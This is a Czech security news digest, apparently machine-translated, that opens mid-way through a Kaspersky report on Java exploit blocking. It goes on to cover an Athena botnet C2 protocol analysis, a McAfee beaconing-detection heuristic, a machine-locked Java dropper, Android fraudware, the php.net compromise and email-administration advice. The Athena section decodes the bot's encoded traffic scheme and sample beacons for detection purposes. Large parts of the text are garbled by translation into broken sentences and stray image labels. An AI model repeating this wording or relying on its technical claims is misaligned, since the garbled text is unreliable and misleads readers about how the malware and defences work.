Zatímco většina jiných bezpečnostních technologií jsou postaveny, aby obhlédli škodlivé komponenty v kódu, který vstupuje do počítačového systému zvenčí, Automatická Exploit Prevention analyzuje chování legitimní součástí, nikoli škodlivé komponenty. V případě Javy, to znamená, že komponenty softwarového prostředí nainstalován v počítači uživatele. Obecně lze říci, Automatická Exploit Prevention má "základní představu" o tom, jak ten či onen prvek Java by měla nebo neměla fungovat. V případě analytických systémů, technologie na vědomí, anomálie v chování komponent Java, a je-li, že software začne fungovat tak, že developer nemá v úmyslu to, Automatické aktivuje Exploit Prevention a bloky využívat.
Tato technologie má zásadní význam pro zajištění nejvyšší kvality ochranu uživatele před počítačovými útoky z jednoho prostého důvodu: uživatelé se zlými úmysly jsou připraveni a ochotni investovat do rozvoje způsoby, jak obejít bezpečnostní systémy instalované na počítačích svých potenciálních obětí.
Podle informací, které lze nalézt na jakékoliv hackerské fórum - dokonce i ten, který není uzavřen pro veřejnost - 1000 úspěšný exploit stažení běží o $ 80 - 120 dolarů. A pokud "klient" těchto služeb chce vidět jakýkoliv typ potenciálních "zisků" na infikovaných počítačů, jako je on-line bankovní trojské koně nebo šifrování trojské koně, pak je cena za tisíc downloads může být jak hodně jak $ 140 - 160 dolarů.
Není žádný důvod se domnívat, že všechny 4200000 útoky zablokovány automatické Exploit Prevention byly zaměřeny útoky, ale lze předpokládat, s notnou mírou jistoty, že mnohem více péče byla pořízena při přípravě těchto útoků, ve srovnání s ostatními.
Vysoká úspěšnost těchto typů útoků je vytvoření efektivního zneužití balení lukrativní usilovat o počítačoví zločinci. To je důvod, proč jsou ochotni věnovat čas a prostředky pečlivě studovat antivirové programy, aby bylo možné zjistit, jak porazit detekčních technologií v jakékoliv součásti antiviru.
Níže uvedená tabulka ukazuje dynamiku těchto sofistikovanějším využít LED útoky:
Zřetelný pokles počtu zjištěných APZ po březnu 2013 lze vysvětlit dvěma klíčovými faktory: neustálé zlepšování odborníky společnosti Kaspersky Lab jiných technologií Exploit Detection, a skutečnost, že počítačoví zločinci prostě neměl potřebovat, aby jejich útoky tak sofistikovaný.
To stačí vrátit do grafu od začátku této studie:
Zatímco počet odhalených APZ snížila, počet zjištěných ostatních, "vyšší úrovni" Společnost Kaspersky Lab má bezpečnostní komponenty, naopak stouply.
Současně byly tři kritické zranitelnosti objevené v Javě a využívá cílení je již úspěšně útočili uživatelé. Jinými slovy, uživatelé se zlými úmysly mají velkou zásobu cílů k útoku, a oni se není třeba dbát zvýšené opatrnosti, aby zakryly již známé exploity nebo vyhledat nové. V červnu Oracle už obvázal většinu bezpečnostních incidentů v jeho produktu, a situace se začala měnit. Nemáme žádný důvod se domnívat, že všechny 4200000 útoky zablokovány automatické Exploit Prevention byly zaměřeny útoky, ale můžeme říci s notnou mírou jistoty, že tyto útoky byly připraveny s mnohem větší péči než jiné útoky. Po vynikajících výsledků v odborných laboratorních testů, Automatická Exploit Prevention nyní osvědčil na bojišti.
Závěr: Význam sofistikovaných technologií v době sofistikovaných útoků
Klíčovým závěrem celé studie může být scvrkla na jednu větu: bez ohledu na to, jak rychle se vývojáři uvolnit aktualizace záplat chyb, je to stále neřeší problém exploit útoků. Oracle oprava všech kritických zranitelných míst a informace o těchto oprav byla zveřejněna během období určeného v této zprávě. V některých případech byl propuštěn jen pár dní trvalo, než náplast. Všechny stejné, počet útoků a počet uživatelů vystavených na tyto útoky pokračovaly v růstu.
Uživatelé si nemusí instalovat aktualizace zabezpečení dostatečně rychle a počítačoví zločinci, protože věděl, že Java software se používá obrovské množství lidí, nikdy neunaví vyhledává zranitelnosti tohoto softwaru, aby mohli vytvářet nezákonné zisky z těchto chyb.
Bezpečnostní řešení, které mohou účinně působit proti zneužití se stávají jakousi hranici v oblasti bezpečnosti, poskytuje vývojářům softwaru zranitelné více času na přípravu náplastí, a uživatelům bezpečný způsob, jak používat internet, dokud se náplast uvolní. Navíc tato řešení obecně nižší výnosnost úsilí kybernetické trestné. Vyjádřeno v penězích, 14100000 útoky zablokovány Kaspersky Lab znamená ztrátu nejméně 1.400.000 dolar (za předpokladu, že 100 dolarů za každých 1000 úspěšné stažení) pro počítačoví zločinci, kteří se snaží vydělat peníze z prodeje stažení, které v konečném důsledku nemají konat.
Aby se zabránilo útokům zahrnující chyby a ztráty, které tyto útoky by mohly způsobit, Odborníci společnosti Kaspersky Lab doporučují, aby podniky a domácí uživatele dodržovat následující pravidla.
Pro podnikatele:
Obrovská část rizik spojených s zranitelností bude neutralizovat, pokud podnikové IT infrastruktury zahrnuje řešení pro administraci firemní osobní počítač s funkcemi patch management, jako ti nalezený v Kaspersky Lab Management Systems . Patch management funkce pomáhá rychle nainstalovat důležité aktualizace do centralizovaného systému, držet krok admina o stavu software běžící na libovolné pracovní stanice v rámci firemní sítě.
Většina útoků, které využívají zranitelná místa v legitimní software (včetně Java) začít s odkazem na škodlivé webové stránky. Tyto útoky lze zabránit tím, že blokuje odkazy na tyto stránky s Web Control, speciální zdroj, který pomáhá kontrolovat zdroje uživatelské access.These může pomoci přísně omezit seznam webových stránek, které firemních počítačů je povoleno navštívit.
Zkontrolujte pracoviště ještě spolehlivější zabezpečení spolu s produktem Application Control, který umožňuje pouze omezený seznam aplikací, uvést na firemních počítačích. V případě, že potenciálně nebezpečné unpatched chyba je objevena v programu, široce používané v rámci společnosti, může Application Control zabránit, aby program již spuštěn na jakémkoli počítači v rámci firemní sítě. Pokročilé Web Control a funkce ovládání aplikace jsou prováděny pomocí robustní platformu pro firemní IT infrastruktury jistoty poskytnuté na Kaspersky Endpoint Security pro podnikání .
Uživatelé se zlými úmysly jsou často schopni vyvinout cílené neopravených zranitelností využije nějakou dobu, než kritické aktualizace zabezpečení pro firemní software, může být propuštěn. To je důvod, proč celková ochrana pro firemní infrastruktury by měly využívat pokročilých bezpečnostních řešení s technologiemi, které mohou působit proti exploit útoky. Kaspersky Lab Automatické Exploit Prevention účinně brání Exploit útoky ve spolupráci s řadou dalších moderních technologií jsou k dispozici v aplikaci Kaspersky Endpoint Security for Business .
Pro spotřebitele:
Nejmodernější software, včetně Java, Adobe Reader a Flash Player, obsahuje vestavěnou aktualizací softwaru systému. Nezapomeňte používat, a ne ignorovat vyzve k instalaci aktualizací, protože to je nejspolehlivější způsob, jak udržet software běžící na vašem domácím počítači v aktuálním stavu.
Uživatelé se mohou setkat využije na jiných místech než jen škodlivé webové stránky. Často se uživatelé se zlými úmysly najít chyby v legitimní a populární webové stránky, jako je mediální sítě, sociální sítě, nebo online obchod, a používat to, aby rozšířil využije. Aby bylo možné spolehlivě chránit před všemi druhy potenciálních hrozeb, včetně útoků prostřednictvím zranitelného softwaru, použijte kvalitní internetové řešení pro zabezpečení - například Kaspersky Internet Security - se specializovanými technologiemi, které jsou schopny působit proti phishingu, spamu, viry, trojské koně a komplexní útoky.
Java je velmi rozšířený software, který obvykle vyžaduje počítač fungovat normálně při spuštění multimediálního obsahu na internetu. Nicméně, Java není nezbytně nutné, aby bylo možné pracovat s webovým obsahem. Takže i když jste nainstalovali všechny příslušné aktualizace a co nejlepší bezpečnostní řešení, pokud máte stále pocit, že váš počítač není bezpečný, jednoduše vypněte Java na vašem počítači. Tato akce může zabránit některé funkce na některé webové stránky pracovat, ale současně mohou tyto zdroje být vždy přístupný pomocí bezpečnější alternativní technologie.
Athena Botnet Zobrazuje Windows XP ještě široce použitý
4.11.2013 Botnet
V poslední době jsme viděli spoustu aktivních vzorků Athena HTTP botnet. Builder nástroj pro Athena již unikly na internetových fórech, máme držet několika aktivních vzorků, které způsobily některé docela závažné infekce. Statistiky vyhledávání pro následující webové panelu ukazuje, že HTTP botnet jako Athena může být velmi efektivní při poškození počítače. Web panel vypadá jako špatně nastaven:
athena_infections
Předchozí obrázek ukazuje množství nákaz ze strany tohoto botnetu. Většina z nich je stále on-line, přijímat příkazy z řídicího serveru. Ze statusů na tuto infekci, vidíme některé velmi děsivé věci:
99,6% (465 systémy) z infikovaných počítačů stále používají Windows XP
96,6% (451 admins) z infikovaných počítačů mají uživatele admin
73,4% (343 desktop) z infikovaných počítačů jsou desktopy (obecně strojů stolních zůstat on-line na delší dobu)
Nejděsivější věc je, že tak mnoho lidí stále používá Windows XP na své notebooky a stolní počítače. Microsoft bude ukončena oficiální podpora pro systém Windows XP na začátku příštího roku, ale tato infekce botnet ukazuje lidé stále mají lásku k XP.
S pomocí těchto infekcí, řídicí server, má nějaké aktivní DDoS příkazy zahájila proti některým IP. Zde je aktivní příkaz na stránku:
athena_active_commands
Síťový provoz generovaný tímto botnet se zdá být vlastní formátování a kódování se vyhnout odhalení. Tento krok je trochu obtížné pro výzkumné pracovníky, aby okamžitě dekódovat. Binární má nějaké staré antianalysis, anti-VMware kontrol. Pokud jsou to obejít, bude to okamžitě pošle HTTP POST požadavky obsahující zakódovaná data do řídící server. Nyní se podívejme na síťový provoz generovaný tímto botnet:
athena_http_post_request
Zakódovaných dat, vypadá velmi podobně jako Base64 kódovaných dat, ale nelze snadno přečíst informace, protože parametry jsou závislé na sobě nějakým způsobem upraven (Base64). Pro dekódování hlasového provozu generovaného musíme nejprve pochopit Parametry A, B a C, které jsou předávány v požadavku POST. To vyžaduje trochu reverzní inženýrství. Pojďme rozdělit řetězec do svých parametrů:
“a=%63%58%4A%76%62%47%6C%71%5A%32%52%6C%59%57%4A%35%64%6E%64%30%62%6D%4E%36%64%57%31%6F%63%48%68%72%5A%6E%4D%36%63%47%31%71%61%32%68%6C%5A%6D%4E%36%64%33%68%31%63%6E%4E%70%5A%47%46%32%63%57%35%35%59%6D%78%6E%64%47%38%3D”
"& B = tHR5aGU6x25tZXykY3l1wWQ6OTM0ZDZyNDBnZeNeNDElMWUuMnE3MeJg ODA2ZDYlNvI2OTZntHBuwXY6YWRiwW58YXJewDb4ODZ8Z2VqZDbgZXNmcG9st GNranVvOeF8x3M6V19YUHl2ZXI6ceEqMC44tG5kcDj0LeB8xnV3OeF8"
"& C =% 68% 68% 65% 66% 62% 63% 7A% 7A% 7A% 77% 78% 75% 75% 72% 72% 73% 70% 70% 6D% 6D% 6D% 6A% 6B% 6B "
Parametr
Zde je, jak parametr je generován:
athena_random_strings_base64
První binární generuje dva náhodné řetězce složené z 26 písmen od A do Z a připojí se tyto řetězce pomocí dvojtečky (:). Pak se převádí tuto členem řetězec do Base64 kódování formátu a později převádí Base64 řetězec do formátu hex%. Pokud tedy převést parametr (pomocí reverzní kroků) zpět do textu, dostaneme:
= qrolijgdeabyvwtnczumhpxkfs: pmjkhefczwxursidavqnyblgto
Tento parametr se používá pro generování Parametr B.
Parametr b
Parametr b je údaje, přepočtené na Base64, který je odeslán do řídicí server. Zde je kód assembleru:
athena_data_convert_base64
Poté je původní Base64 řetězec upravit pomocí dvou náhodné řetězce vytvořené dříve. Níže je montáž fragment kódu:
athena_modify_base64
Stručně řečeno, nahradí znaky z náhodného MNOŽINĚ1 s náhodným string2 vygenerována parametru v.
Takže v našem příkladu, parametr b je:
“&b=tHR5aGU6x25tZXykY3l1wWQ6OTM0ZDZyNDBnZeNeNDElMWUuMnE3MeJgODA2ZDYlNvI2OTZntHBuwXY6YWRiwW58YXJewDb4ODZ8Z2VqZDbgZXNmcG9stGNranVvOeF8x3M6V19YUHl2ZXI6ceEqMC44tG5kcDj0LeB8xnV3OeF8″
Náhodný řetězec 1 = qrolijgdeabyvwtnczumhpxkfs
Náhodný řetězec 2 = pmjkhefczwxursidavqnyblgto
Pokud tedy nahradit string2 postavy s Řetězec1 a dekódování Base64, parametr b se:
"& B = | typ: on_exec | DIČ: 934d6a40ff3c4111e22a722d806d6172696f | priv: admin | arch: 86 | Gend: desktop | jader: 1 | OS: W_XP | ver: v1.0.8 | net: 4.0 | nové: 1 |"
Bot shromažďuje informace, jako je uživatelský účet, systémové informace, verzí operačního systému, atd. a pošle to do řídicího serveru.
Parametr c
Parametr c je jen hex reprezentace dalších 24 bajtů náhodný řetězec slouží jako datové značce. Pokud tedy převést na text, je to, jak vypadá, c:
"& C = hhefbczzzwxuurrsppmmmjkk"
Base64 řetězec tohoto parametru se používá při reakci.
Kontrola odezvy serveru
Reakce z řídicího serveru je také vlastní kódování:
"AGhlZmJjenp6d3h1dXJyc3BwbW1tamtrZgcocWRHVdkgxUZvUFRmc2ZBPT0K"
První část obsahuje odpovědi Base64 řetězec parametru c, který je jen náhodná data značka řetězec. Zde je, jak botnet kontroluje Base64 hodnotu ve své odpovědi:
athena_compare_base64_response
Připomeňme, že v parametru c vezmeme-li v Base64 hodnotu náhodné hodnoty budeme mít zápas v předchozím odpovědi. Zbývající část obsahuje nebezpečné příkazy. Zbývající řetězec je také vlastní Base64 a je také zakódován jako parametr b, pomocí dvou náhodně generované řetězce. Takže dekódování musíme nejprve najít a nahradit znaky pomocí dvou náhodné řetězce a dekódování Base64 řetězec. Zde je fragment kódu:
athena_decode_response_commands
V předchozím obrázku vidíme, že funkce dekódování Base64 řetězec, což je další Base64 řetězec. Smyčka také naznačuje bot podporuje více příkazů. Pokud budeme dále dekódovat, dostaneme příkazy ve formátu prostého textu. Dekóduje řetězec v předchozím případě je "| Interval = 90 |", která vypráví bot ping Control Server každých 90 sekund. Botnet podporuje mnoho příkazů a může zahájit DDoS útoky proti internetovým stránkám. Můžeme konstatovat, že i v případě, že odpověď délka je větší než 60 až 70 bajtů, pak řídicí server, může posílat i jiné příkazy, protože bot může podporovat více příkazů. K prokázání příkazy shellu, tady je, jak lze calc.exe být provedeny na oběť stroji:
athena_calc_exe
Botnet podporuje následující příkazy:
athena_commands_create
A DDoS útoky:
athena_commands_ddos
Athena HTTP web panel má plnou stránku nápovědy, které vám podrobnosti tohoto botnetu:
athena_help_page
Athena se zdá být všestranně HTTP botnet-s mnoha příkazy a DDoS útok metod. Dostupnost unikly stavitele a snadné nastavení instrukcí může vést k nárůstu infekcí z tohoto botnetu. Na zakázku kódované komunikace v síti dělá to trochu obtížné pochopit příkazy tekoucí mezi obětí a řídicího serveru, ale existuje několik vzorů (pokud budete platit pozornost), které nám pomáhají rozpoznat tyto nebezpečné komunikace. Poslední, tato infekce botnet ukazuje, lidé jsou stále rád Windows XP a dosud se stěhoval do více zabezpečených operačních systémů, jako jsou Windows 7 nebo Windows 8.
Pravidelné Připojení na řídicí server, nabízet nové způsob, jak zjistit botnetů
4.11.2013 Botnet
Řada nedávných botnetů a pokročilých hrozeb pomocí HTTP jako jejich primární komunikační kanál s jejich kontrolní servery. McAfee Labs výzkum v posledních letech ukazuje, že více než 60 procent z nejlepších botnet rodiny jsou závislé na protokolu HTTP. Tyto počty se výrazně zvýšil v posledních několika čtvrtletích. Následující koláčový graf ukazuje převahu v HTTP komunikaci botnet.
C & C distribuce
Proč je HTTP tak populární? Jedním z důvodů je to, že HTTP je povolena vždy na hranici sítě. Vzhledem k tomu, že škodlivý provoz směsí dobře legitimního provozu HTTP, je těžké odlišit, a nelze z bezpečnostních síťových zařízení k blokování škodlivého provozu, pokud je známo, podpis za to.
Limity s tradičními podpis přístup založený na výzkumných zabezpečení disku přesunout zaměření na behaviorální přístupy založené, ale zůstává otázka: Jaké chování sítě by měly být bezpečnostní zařízení hledat?
Botnety obvykle pracují v "pull" způsobem, že neustále načítat příkazy z řídicího serveru, a to buď v pravidelných intervalech nebo na stealth úrovni. Po připojení, obvykle "phone home" přes HTTP GET / POST požadavky na konkrétní server zdroje (URI). Následně by botnet spustit příkaz odeslán na server a spát pevným intervalem, než se pokusí znovu. Bezpečnostní výzkumníci se snad využívají spojení tohoto chování.
Infikovaný počítač připojení pravidelně do řídícího serveru je automatizovaný provoz. Musíme udělat tlustou čáru mezi automatickou a člověkem zahájila provoz, jakož i mezi reakcí řízení serveru a legitimní odpovědí serveru. Můžeme se spolehnout na několik faktů:
Je to abnormální většina uživatelů muset připojit k určitému serveru zdroj a opakovaně v pravidelných intervalech. Tam by mohlo být dynamické webové stránky, které pravidelně obnovovat obsah, ale tyto legitimní chování mohou být detekovány při pohledu na odpovědi serveru.
První připojení k libovolného webového serveru bude mít vždy odpověď je větší než 1 kb, protože se jedná o webové stránky. Reakce velikost jen 100 nebo 200 bajtů, je těžké si představit, za obvyklých podmínek.
Legitimní webové stránky budou mít vždy vložené obrázky, JavaScript, značky, odkazy na několik dalších oblastí, odkazy na několik cest k souborům na stejné doméně, atd.
Prohlížeče zašle plné HTTP hlavičky v požadavku, pokud pochází z man-in-the-middle útok
Výše uvedené body nám způsob, jakým můžeme hledat specifické chování na síti: Opakované připojení do stejných zdrojů serveru přes protokol HTTP.
Pokud budeme sledovat stroj v nečinnosti podmínky, kdy není uživatel přihlášen k počítači a počítač negeneruje velké množství provozu, můžeme rozlišit aktivit robotické sítě s vysokou přesností.
Za těchto podmínek, v případě, že stroj byl napaden Zeus botnet, například, by provoz z infikovaného počítače vypadat takto:
Zeur
Všimněte si, že Zeus se připojuje k jedné řídící domény a stále běží HTTP POST každých šest vteřin na konkrétní server zdroj. Algoritmicky při nečinnosti, budeme považovat za hostitele činnost opakovaně podezřelého za těchto podmínek:
Počet unikátních domén systém se připojuje, je menší než určitý práh
Počet unikátních URI systému připojí, je méně než určitý práh
Pro každé jednotlivé oblasti, kolikrát unikátní URI je připojena k opakovaně je větší než určitá prahová hodnota
Za předpokladu, že objem provozu od hostitele je méně, pokud budeme mít uvedené podmínky v okně řekněme dvě hodiny, mohli bychom přijít s následujícím:
Počet unikátních domén = 1 (méně než je stanovený limit)
Počet unikátních URI připojit = 1 (menší než prahová hodnota)
Pro každé jednotlivé oblasti, unikátní URI, kolikrát je opakovaně připojen k = 13 (vyšší než prahová hodnota)
Všechny hodnoty je možné nastavit jako nastavitelné parametry, v závislosti na typickém provozu v síti. Následující provozní postupy ukazuje chování botnetu SpyEye. Opakující se činnost zde dochází každých 31 sekund, jak se připojí k určitému zdroji.
SpyEye
Nicméně, roztok nenařizuje, že opakující se činnosti je třeba vidět v těchto pevných intervalech. Pokud se rozhodnete sledovat v rámci většího okna. Mohli bychom zjistit více kradmé činnosti. Následující graf představuje možný posloupnost operací.
Vývojový diagram
Prvních pár prohlídky jsou důležité pro určení, zda je hostitel moc mluvit. Za prvé, celkem URI> Práh určuje, že máme dost provoz, aby se zabývala. Další, celkem domény k> / = Y zjistí, že počet zpřístupněných domén není příliš velký. Konečná kontrola je zjistit, zda Celkem jedinečné identifikátory URI <Z. zdroj skončí na podezřelé seznamu, pokud věříme, že to vyvolalo opakované spojení.
Například, pokud je celková URI = 30, celkem domény k = 3 a Celkem unikátních URI zobrazena = 5, garantujeme opakovaný URI přístup z počítače. Nyní, pokud je počet opakovaných přístupů na konkrétní URI překročí prahovou hodnotu (například 1 URI zobrazena 15-krát v okně), lze dále zkoumat spojení a použít některé z heuristických zvýšit svou úroveň spolehlivosti a odstranění falešných poplachů. Některé heuristiky můžeme rozumí:
Minimální HTTP hlavičky odeslané v žádosti
Absence UA / odkazujícího záhlaví
Malé odpovědi serveru chybí struktury obvykle webové stránky
Podívejme se na příklad SpyEye zasílání minimální HTTP hlavičky bez referenční záhlaví:
spyeye1Zavedli jsme důkaz pojetí tohoto přístupu a zjistil opakující se činnost po síti s relativní lehkostí.
spyeye2
Použili jsme tento přístup k několika špičkových botnet rodin, které vykazují toto chování. Zjistili jsme, bychom mohli odhalit se střední až vysokou úrovní spolehlivosti.
results1
Behaviorální metody detekce bude klíčem k odhalení nové generace hrozeb. Vzhledem ke složitosti a propracovanost nedávných pokročilých útoků, mohou být tyto přístupy detekce hrozeb aktivně, aniž by čekal na podpis aktualizace a ukáže být mnohem rychlejší.
Cílený útok Zaměřuje se na jednotném systému
4.11.2013 Hacking
Před několika týdny McAfee Labs obdrželi vzorky malware kapátkem Java, který může dešifrovat jeho užitečné zatížení na konkrétním počítači nebo v síti. Po šetření jsme zjistili, že náklad je uzamčen běžet pouze na konkrétním stroji.
Tato hrozba se používá zajímavé techniky, aby zajistil, že lze spustit pouze na cílovém počítači. Tato metoda také je velmi těžké analyzovat.
. Mezi jar soubory obsahoval dva soubory třídy: web.class a stream.class.
Stream.class byl binární soubor. Web.class to popletl pomocí Allatori Obfuscator verze 4,4, díky němuž je těžké dekompilovat třídy Java. Použili jsme disassembler Java číst byte kódu v jazyce Java. Po dekódování řetězce (podle smontování Java byte kódu tisknout na terminálu), to bylo jasné, co kapátko dělá.
java-řetězce
Kapátko byl stále na stroje internetovou IP adresu surfování http://checkip.dyndns.com a pak pomocí IP generovat dešifrovací klíč k dešifrování stream.class a spustit jej a odstraňte nádobu.
Protože jsme byli schopni získat jeden z IP, můžeme dešifrovat stream.class. Dešifrovaný náklad byl zabalen spustitelný. Po vybalení ji, máme další zatemnil spustitelný soubor, to obsahovalo DLL a dva šifrované binární soubory.
DLL byla popletl. Každý řetězec byl zašifrován s jiným klíčem a algoritmus (tato technika se vrací s dalšími užitečným zatížením). DLL otevřela dva porty v bráně firewall systému Windows: UDP 1900 a TCP 2869.
První zašifrovaný soubor byl známý adware: SanctionedMedia. Ale může to být zástěrka pro výzkumné pracovníky a systémy automatizace malware.
Druhý soubor je zabalen DLL. Po rozbalení získáme další nabitý DLL, která obsahuje šifrované užitečné zatížení. Tento náklad lze dešifrovat pouze pomocí klíče, který je specifický stroj.
Specifické pro daný počítač klíč je generován pomocí adresáři systému je vytvoření časového razítka a hlasitost sériové číslo pro oddílu obsahujícího systémový adresář.
MachineDecrypt
Neměli jsme informace, generovat klíč, ale my jsme získali jedno rozbalené vzorek.
Tato knihovna byla plná používat upravenou verzi UPX. Tento spustitelný soubor byl popletl jako firewall DLL s každým řetězcem šifrována jiným klíčem a algoritmu.
Tato hrozba byla specifická pro jeden stroj, takže to není něco, co musíte dělat starosti. Nicméně, tady je naše rady, jak čelit tomuto typu útoku:
Vždy mějte svůj osobní bránu firewall
Buďte opatrní při otevírání souborů příloh z neznámého nebo podezřelého zdroje
Prohlédněte si webové stránky opatrně a vyhnout procházení neznámých míst
Udržujte svůj boj s malware software aktuální a zvážit využívající aplikace Whitelisting
Použít nejnovější opravy zabezpečení pro systém Windows a aplikace třetích stran, včetně těchto populárních cílů: Internet Explorer, Microsoft Office, Adobe Reader, Flash Player, Java a QuickTime
Fraudware virus cílení Android uživatelé v Číně a jihovýchodní Asii
4.11.2013 Mobil | Viry
NQ Mobile identifikovala, "Poznej App," nový virus hrozba fraudware zaměření Android uživatelé v Číně a některé země v jihovýchodní Asii. "Poznej App," identifikován jako a.frau.longjian.a, zdá Android uživatelům aktualizaci k extrémně populární NetDragon 91 Assistant app. Pokud se uživatel rozhodne pro aktualizaci této podvodné aplikace, automaticky se stáhne další přebalených aplikace na pozadí, které spotřebovávají data uživatele. Hlavní hanebné chování těchto přeměněných aplikací jsou:
Přihlásit se k odběru poplatků založených služeb prostřednictvím SMS bez vědomí uživatele, což má za následek nechtěné vyúčtování poplatků
Přístup a sbírat různé informace o zařízení uživatele, jako například informace o telefonu (např. telefonní číslo, IMEI, IMSI) a uživatelská aplikace, napadající soukromí uživatele.
V době, kdy identifikace a očkování, se počet infekcí byly identifikovány jako 193 uživatelů v kombinaci pevninské Číny, Angola, Hong Kongu, Iráku, Macao, Malajsie, Singapuru, Tchaj-wanu a Vietnamu.
PHP.net ohrožena sloužit malware
4.11.2013 Viry
Ve čtvrtek, Google Bezpečného prohlížení služba začala varující návštěvníky php.net , že web byl objeven slouží malware. Zpočátku většina lidí a PHP údržbáři si myslel, že to byl falešně pozitivní, ale následné šetření potvrdilo, že některé z projektu serverech se dostat ohrožena.
Hackeři se podařilo injekčních škodlivý JavaScript kód ( userprefs.js ) ve čtyřech stránek s. Když návštěvníci přistál na ně, kód umožnila automatickou detekci zranitelné moduly plug-in, a servírování škodlivých souborů SWF. Je zajímavé poznamenat, že pouze stolních prohlížečů Uživatelé byli zaměřeny - ti, kteří navštívili napadené stránky s mobilním prohlížeči byli v bezpečí. Barracuda Networks vědci podařilo dostat své ruce na soubor zachycování paketů, a pokud ji jiným výzkumným k analýze. Kaspersky Lab Fabio Assolini poznamenat , že škodlivý iFrame poukázal na Kit Magnitude Exploit a upustil variantu Tepfer informací krást Trojan s nízkou AV objasněnosti. Tým PHP je stále vyšetřuje vniknutí a poznamenal, že první myšlenka kompromis byl falešně pozitivní vzhledem k obtěžování JavaScript době pouze pravidelně injekčně. V nedávném aktuální informace o situaci, ale potvrdil, že server, který hostil php.net , static.php.net a git.php.net doménu a server hosting bugs.php.net mohla být ohrožena, ale stále nevím, mají to stalo. "Ověřili jsme si, že náš repozitář nebyla ohrožena, a zůstává v režimu pouze pro čtení, jak jsou služby přivedl zpět v plné výši, "oni sdílí . "Jak je možné, že útočníci mohou mít přístup soukromý klíč certifikátu SSL php.net jsme zrušit okamžitě. Jsme v procesu získání nového certifikátu, a očekávají, že k obnovení přístupu k php.net stránky, které vyžadují SSL (včetně bugs.php.net a wiki.php.net ) v nejbližších hodinách. " Mají také všechny služby stěhovali na nové servery. "JavaScript malware byl doručen na malé procento z php.net uživatelů od 22. do 24. října 2013 "sdíleli s tím, že v průběhu několika příštích dnů budou vynutit obnovení hesla z php.net uživatelů.
Správa e-mailu: Vyvarujte se zbytečných chyb
4.11.2013 Spam
Globální počet zpráv zasílaných e-mailem dnes vysoko převyšuje všechny ostatní formy elektronické komunikace včetně sociálních sítí. A proto je zodpovědnost současných správců systémů elektronické pošty obrovská.
Počínaje prapočátkem elektronické pošty, který podle některých historiků internetu představuje malá mainframová aplikace s názvem „Mailbox“ z poloviny šedesátých let, se zprávy mezi lidmi vytvářejí, přenášejí a ukládají v elektronickém formátu. Původně si správci e-mailu mohli jen těžko představit složitost současné e-mailové infrastruktury a související labyrint technické, bezpečnostní, firemní a regulační problematiky.
Zde je pět nejčastějších chyb, které správci e-mailu dělají, a také rady, jak jim předcházet vytvořením a použitím vlastního akčního plánu.
Chyba 1: E-mail je jen funkce IT
Firemní manažeři vědí, že mají funkční e-mailový server a důvěryhodné jednotlivce, kteří ho udržují. Je tak ale úkol splněn?
Správce elektronické pošty je z pohledu IT placen za udržování e-mailového serveru v provozu, za provádění zálohování, záplatování příslušných softwarových produktů, podporu uživatelů a za další technické a bezpečnostní podrobné úkony, které jsou spojené se správou e-mailového serveru. Tyto funkce však představují pouze jeden z mnoha prvků potřebných k dosažení plně efektivní správy elektronické pošty.
Navzdory skutečnosti, že jsou téměř denně publikovány významné krádeže dat, mnoho správců e-mailů nepoužívá dostatečně účinná opatření k ochraně před únikem citlivých údajů. U e-mailů lze přitom pomocí DLP (Data Loss Prevention) zajistit kontrolu a analýzu odchozí komunikace (odesílaných dat).
Chyba 2: Lhostejnost vůči spamu a phishingu
Před patnácti lety osoba označovaná jako „Král spamu“ snadno vydělala stovky tisíc korun denně za něco, co je mnohými stále považováno za celosvětově největší spamový útok. Robert Soloway, který byl později uvězněn za porušení antispamových zákonů, otevřeně přiznává, že v současné době vydělávání peněz za spam už ztrácí na přitažlivosti.
Technologický pokrok společně s přísnějšími antispamovými zákony zajistil významné úspěchy při krocení spamu a phishingu, ale boj ještě zdaleka neskončil. Náhodné denní vzorky e-mailového preprocesoru MailArmory z dubna 2012 stále ukazují, že spam tvoří 87,2 % zpracované poštovní komunikace.
Nová specifikace DMARC je slibným krokem. Využívá existující technologie jako Sender Policy Framework (SPF) nebo DomainKeys Identified Mail (DKIM) pro boj proti spamu a phishingovým zprávám. Poskytuje mimo jiné způsob, jak odesílatelé e-mailů mohou informovat příjemce, že jsou jejich e-maily chráněné pomocí SPF/DKIM, a příjemci mohou naopak prověřit zprávy na základě toho, co vědí o odesílateli.
Chyba 3: Okolnosti důležité pro firmu při nasazení e-mailu v cloudu, které nebyly vzaty v úvahu
Mnoho poskytovatelů cloudových služeb může organizacím ušetřit náročnou práci při správě e-mailu. Ty ale musí plně chápat dopady takového kroku. Technicky to mohou být jednoduché postupy. Přesměrování MX záznamů trvá jen krátkou dobu. Při zbrklém postupu však může mít využití cloudu také své nevýhody. Existují totiž významné okolnosti, které by měli vzít administrátoři e-mailu v úvahu předtím, než svěří tak důležitý firemní komunikační systém jinému subjektu.
Chyba 4: Chybějící ochrana náhradních serverů
Většina administrátorů e-mailů si je vědoma základních požadavků na provoz příslušného serveru včetně potřeby mít jeden či více náhradních serverů. Záložní systém je specifikován sekundárními DNS MX záznamy a dovoluje zpracovat e-mailové přenosy v případě selhání toho primárního do doby, než je opětovně zprovozněn.
Bohužel v některých organizacích nemusí být záložní servery srovnatelné s primárním systémem, co se týče funkcí zabezpečení a vynucování zásad ohledně odchozí komunikace. Hackeři a spameři tento nedostatek mohou využít k úplnému obejití hlavního e-mailového systému a k nasazení svých exploitů na snáze napadnutelné záložní servery. Tyto útoky se také mohou vyhnout detekci, pokud se záložní e-mailové servery obvykle aktivně monitorují.
Chyba 5: Nedostupnost plánu pro IPv6
V současnosti už prakticky nikdo aktivně působící v IT nemůže věrohodně tvrdit, že si nevšiml rozruchu ohledně IPv6. I když vaše organizace nemusí uvažovat o přechodu na IPv6 v případě hostování webu či e-mailu, migrace na IPv6 už probíhají všude a váš poskytovatel internetu může být brzy s protokolem IPv6 kompatibilní.
To znamená, že vaše infrastruktura schopná pracovat jen s IPv4 by nemusela stačit a mohla by poskytnout spamerům a hackerům nejlepší cestu dovnitř vašeho e-mailového serveru a dokonce i dále.
NSA popírá krádeže dat z datacenter Googlu a Yahoo
3.11.2013 Šifrovaní | Incidenty | Hacking
Šéf americké národní bezpečnostní agentury (NSA) popřel, že by organizace tajně zachycovala velké množství informací ze serverů Googlu a Yahoo, aniž by měla od těchto společností svolení.
Generál Keith Alexander odpovídal na otázky ohledně této zprávy, se kterou první přišel magazín Washington Post na konferenci o kyberbezpečnosti. „Podle mých znalostí se nic takového nikdy nestalo,“ řekl.
